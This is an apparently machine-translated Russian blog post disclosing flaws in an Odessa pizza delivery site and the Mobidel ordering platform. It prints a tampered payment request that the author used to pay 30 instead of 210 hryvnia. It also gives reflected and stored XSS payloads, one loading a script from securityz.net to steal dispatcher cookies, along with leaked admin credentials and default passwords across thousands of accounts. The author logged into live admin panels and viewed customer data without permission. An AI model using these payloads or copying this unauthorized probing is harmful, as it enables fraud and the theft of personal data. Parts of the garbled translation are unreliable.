Часто заказываю пиццу в Одессе, больше всего люблю доставку Pizza.od.ua, там не экономят на начинках и можно создать пиццу из своих ингредиентов, в то время как в других службах доставки можно выбрать только ту пиццу, которая есть.
предложенных вам, добавлять больше ингредиентов или выбирать другие запрещено.
Около двух месяцев назад я подсел на их суши.
В последнее время суши временно не доставляют, поэтому нашла другую службу доставки суши и пиццы.
Я решил проверить его на уязвимости.
Первая уязвимость - самое популярное на таких сайтах - отсутствие проверки суммы оплаты товара( идор ).
В POST-запросе есть переменная цена , Есть окончательная цена , переменную FinalPrice можно отредактировать и предоставить себе скидку на пиццу.
Запрос:
Изменяем окончательную цену и за пиццу мы заплатили 30 гривен вместо 210. Заказ был принят, но администраторы заметили подмену и отказались присылать мне пиццу.POST /oplata.html HTTP/1.1 Host: www.pizza.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0 ) Gecko/20100101 Firefox/51.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://yahoo.com/{{2+2 }} Content-Length: 262 Cookie: streetId=&streetName=qwqwqw&persons=1&change=500&name=qw&phone=%2B38(111)1111111&email=mm%40mm.mm&t-ord=&comment=&promocode=&agreement=on&check-ord=online&order%5B0%5D%5Bid%5D=1162&order%5B0%5D%5Bamount%5D=2&order%5B0%5D%5Btype%5D=rollyi&price=210&finalPrice=30
Вторая уязвимость .
При отправке заказа происходит перенаправление на страницу Pizza.com/your_order.htmlЭorder=567808&ret=1 , на странице отображается номер заказа.
Вместо числа введите js Pizza.com/your_order.htmlЭorder= "> &ret=1 и мы получаем Отраженный XSS уязвимость.
Третья уязвимость это выход из системы csrf и кликджекинг Раскрытие информации и захват административной панели заказы.
Оказалось, что когда мы заказывали еду, она еще не была добавлена в админку для проверки.
Для добавления заказа сайт создает на странице Pizza.com/your_order.htmlЭorder=567808&ret=1 iframe с адресом: http://pizza.com/your_order.htmlЭorder=567808&curl1=aHR0cDovL29ubGluZS5tb2JpZGVsLnJ1L21ha2VPcmRlci5waHA/dXNlcj1yb290JnBhc3N3b3JkPXBhc3dvcmQmd2lkPTQwNTAmZmFtaWx5PSUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNFK3F3JTdCJTdCMisyJTdEJTdEcXcmc3RyZWV0PTElMkMxJTIyJTNFJTNDaW1nK3NyYyUzRHgrb25lcnJvciUzRHByb21wdCUyODElMjklM0UrcXclN0IlN0IyKzIlN0QlN0RxdyZob21lPSZyb29tPSZlbnRyYW5jZT0mZmxvb3I9JnBob25lPTM4MDYzNjgxOTQ2NCZjb21tZW50PSVEMCU5RSVEMCVCRiVEMCVCQiVEMCVCMCVEMSU4NyVEMCVCNSVEMCVCRCslRDAlQkUlRDAlQkQlRDAlQkIlRDAlQjAlRDAlQjklRDAlQkQlMjErJTNDYnIlM0UlRDAlOUQlRDAlQjArJUQwJUIyJUQxJTgwJUQwJUI1JUQwJUJDJUQxJThGJTNBJTIyJTNFJTNDaW1nK3NyYyUzRHgrb25lcnJvciUzRHByb21wdCUyODElMjklM0UrcXclN0IlN0IyKzIlN0QlN0RxdyslRDAlOUYlRDElODAlRDAlQkUlRDAlQkMlRDAlQkUtJUQwJUJBJUQwJUJFJUQwJUI0KyUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNFK3F3JTdCJTdCMisyJTdEJTdEcXclRDAlOUElRDAlQkUlRDAlQkIlRDAlQjglRDElODclRDAlQjUlRDElODElRDElODIlRDAlQjIlRDAlQkUrJUQwJUJGJUQwJUI1JUQxJTgwJUQxJTgxJUQwJUJFJUQwJUJEKy0rMSslRDAlOUYlRDAlQkUlRDAlQjQlRDAlQjMlRDAlQkUlRDElODIlRDAlQkUlRDAlQjIlRDAlQjglRDElODIlRDElOEMrJUQxJTgxJUQwJUI0JUQwJUIwJUQxJTg3JUQxJTgzKyVEMSU4MSsrJUQwJTlBJUQwJUJFJUQwJUJDJUQwJUJDJUQwJUI1JUQwJUJEJUQxJTgyJUQwJUIwJUQxJTgwJUQwJUI4JUQwJUI5KyVEMCVCRiVEMCVCRSVEMCVCQiVEMSU4QyVEMCVCNyVEMCVCRSVEMCVCMiVEMCVCMCVEMSU4MiVEMCVCNSVEMCVCQiVEMSU4RiUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNFK3F3JTdCJTdCMisyJTdEJTdEcXcmYXJ0aWNsZXMlNUIwJTVEPTA1ODkmYXJ0aWNsZXMlNUIxJTVEPTEyMDkmbm9uQ2FzaD0xJnF1YW50aXRpZXMlNUIwJTVEPTQmcXVhbnRpdGllcyU1QjElNUQ9MQ==
curl1 - адрес сайта, который будет загружаться во фрейме, он выглядит как base64, декодируем, декодируем, получаем вот это online.mobidel.ru/makeOrder.phpЭuser=root&password=password&wid=5040&family=our_order_data , wid-id сайта, пытаюсь зайти в админку online.mobidel.ru и мы сделали это.
Смотрим наш заказ, его можно редактировать, отправлять на обработку от имени диспетчера и получить бесплатную пиццу (Конечно, я этого делать не буду).
Также мы можем просмотреть данные всех клиентов и текущих заказов.
Сообщаем службе доставки пиццы об этой уязвимости и получаем любые 10 бесплатных пицц или суши.
Хронология: 29 января .
Сообщил об уязвимости.
30 января.
Вручение 20 бесплатных пицц или суши со скидкой 50% (10 бесплатных пицц).
19 февраля.
Уязвимость устранена.
Теперь давайте перейдем к mobidel.ru .
Заказ создан в запросе get с логином и паролем в открытом виде.
Pizza.com/your_order.htmlЭorder=567808&curl1=хэш .
Существует вероятность того, что такая же уязвимость существует и в других клиентах.
Смотрим страницу с клиентами, и оттуда собираем URL их клиентов.
Мы проверили и оказалось, что это единственный случай, когда логин и пароль были в открытом виде.
Вперед, продолжать.
1) Мы обнаруживаем Сохраненный XSS
Если вы отправляете скрипт через заказ: ">
</script>"><script src= https://securityz.net/any_script.js ?></script> ,
Тогда мы получим печенье диспетчер и давайте взломаем админку заказы с любого сайта, где будет выполняться этот скрипт. Уязвимые поля: Дом, время, промокод, комментарий.
2) Найдите уязвимость Брутфорс и захват аккаунта Регистрируемся, получаем сообщение об активации тестового периода на 30 дней с нашими данными для входа:
- Код предприятия: 5687
- Имя пользователя: disp5687
- Пароль: 123456
Я зашёл в свой аккаунт и сразу не смог найти, где сменить пароль.
Вероятно, и другие пользователи тоже.
Правильно — почти каждый ID имеет пароль 123456. Пароль по умолчанию есть около 2,5 тысяч пользователей (те, кто активировал 30 дней бесплатно и некоторые аккаунты тех, кто на постоянной основе).
Многие адреса электронной почты, номера телефонов и полные имена раскрываются.
Если для диспетчерской был условный пароль 123456, то с курьерской не заморачивались:
- Идентификатор предприятия: 5687
- Имя пользователя: 5687
- Пароль:5687
Они хорошо зарабатывают (может я ошибаюсь, и преобразование из 5600 может и меньше, но все равно неплохо), но на безопасность им плевать.
29 января — отправляем 2 сообщения о нахождении уязвимости, 28 февраля - еще одно письмо, 1 марта — еще три письма, компания по-прежнему игнорирует мои сообщения.
1 марта я связался с руководителем службы доставки пиццы, он прислал мне ссылку на вк программиста, который работает в Mobidel. Я ему написал об уязвимости, он сказал, напишите на тот же адрес электронной почты, в этот раз вас не проигнорируют. Ответ компании:
Привет! Мы бы не назвали это уязвимостью, и ваши действия вполне логичны, пароль 123456 стандарт для всех, кто пользуется системой на постоянной основе они меняют это.Мой ответ:
Те, кто пользуется системой на постоянной основе, меняют ее.Сообщение снова игнорируется, другой ответ:А для тех, кто им не пользуется, вас волнует, что их личные данные украдены?
Нет необходимости игнорировать эту уязвимость; игнорирование этого не является решением проблемы.+ отправить отчет об уязвимости xss с захватом любой службой доставки.
Мы даем компаниям 20 дней чтобы она устранила свои уязвимости или хотя бы ответила на мои сообщения.
Этот не происходит , выкладываю в открытый доступ.
В качестве бонуса есть функция для пентестеров: когда вам нужно протестировать уязвимость на сайте на двух аккаунтах, а ваша почта находится в Яндексе, то вы можете зарегистрировать два аккаунта на одну почту ([email protected]; mail@ya).
.
RU).
Вывод из этой статьи: никогда не следует устанавливать пароли по умолчанию для своих учетных записей; вам следует создавать только сложные пароли, состоящие из заглавных и строчных букв, цифр и символов.
Мемы на эту тему:
Дополнение к статье:
Один хакер с Хабра написал мне на почту письмо, что тоже обнаружил уязвимость в мобиделе.
Я не брутфорсил каталоги, и вообще, после долгого игнорирования сайт практически не трогали.
И пролистал и нашел открытый php файл с конфигами сервера (его было очень глупо не закрыть), там есть данные для: доступа к базе данных, данные для доступа в личный кабинет платежной системы робокасса (можно просмотреть транзакции пользователей и управлять своей учетной записью mobidel), данные для доступа к панели администратора mobidel на их веб-сайте.
Я никуда не пытался залогиниться, просто написал письмо «немедленно закройте этот файл в .
htaccess и смените пароли», очень быстро исправили, теперь файл недоступен.
И сказали спасибо.
Надеюсь, эта статья станет для них уроком и они закроют все свои уязвимости.
Предыдущая статья [ПОИСК ОШИБОК] СЛЕПАЯ XSS-УЯЗВИМОСТЬ НА САЙТАХ ПОДДЕРЖКИ OMNIDESK Вы можете заказать аудит информационной безопасности для продуктов питания Здесь .
Теги: #easy hack #уязвимость #взлом аккаунта #брутфорс #пароль по умолчанию #mobidel #mobidel.ru #отзывы о mobidel #курьер mobidel #загрузка mobidel #доставка пиццы Одесса #одесса #odessa #securityz.net #securityz #w9w #qiece #easy взлом #информационная безопасность #разработка сайтов #тестирование ИТ-систем #тестирование веб-сервисов
-
«Анонимная Дружба» Появится В Chatroulette
19 Oct, 24 -
Анонимность Снова Обновилась - Operator 2.6B
19 Oct, 24 -
Исследования Методов Сегментации Изображений
19 Oct, 24 -
Google Представил Coder
19 Oct, 24